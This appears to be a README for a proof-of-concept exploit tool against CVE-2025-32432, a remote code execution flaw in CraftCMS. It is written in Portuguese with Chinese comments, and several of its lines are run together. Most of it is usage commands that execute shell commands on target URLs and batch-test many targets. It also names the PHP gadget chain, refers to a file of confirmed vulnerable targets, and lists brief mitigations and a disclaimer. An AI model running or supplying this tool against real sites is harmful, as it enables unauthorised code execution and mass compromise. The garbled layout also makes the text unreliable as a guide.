
poc do CVE-2025-32432 gerado por correção da IA
Ferramenta de exploração de execução remota de código no CraftCMS baseada na pesquisa do SensePost.
final_poc.py - POC final otimizado
test.py - Versão simplificada baseada no artigo original do SensePost
yii\rbac\PhpManagerautomated_testing.py - Estrutura de testes automatizados
exploit_summary.md - Resumo da análise da vulnerabilidadetest_results.json - Resultados dos testes automatizadosvulnerable.txt - Lista de alvos com vulnerabilidade confirmada# 基本POC测试
python3 final_poc.py https://target.com/ id
# 调试模式
python3 final_poc.py https://target.com/ "whoami" --debug
# 简化版本
python3 test.py https://target.com/ "ls -la"
# 创建目标文件
python3 automated_testing.py --create-targets
# 运行批量测试
python3 automated_testing.py
GuzzleHttp\Psr7\FnStream para invocar phpinfo()yii\rbac\PhpManager para carregar código PHP dos arquivos de sessãoAtualize o CraftCMS para as versões corrigidas:
Ative o Site Lock para proteger o painel de administração
Restrinja as permissões de acesso aos arquivos de sessão
Implemente regras de WAF para detectar payloads maliciosos
Esta ferramenta destina-se exclusivamente a pesquisa de segurança e testes de penetração autorizados. Os utilizadores devem cumprir as leis e regulamentos locais e não devem utilizá-la para fins ilegais.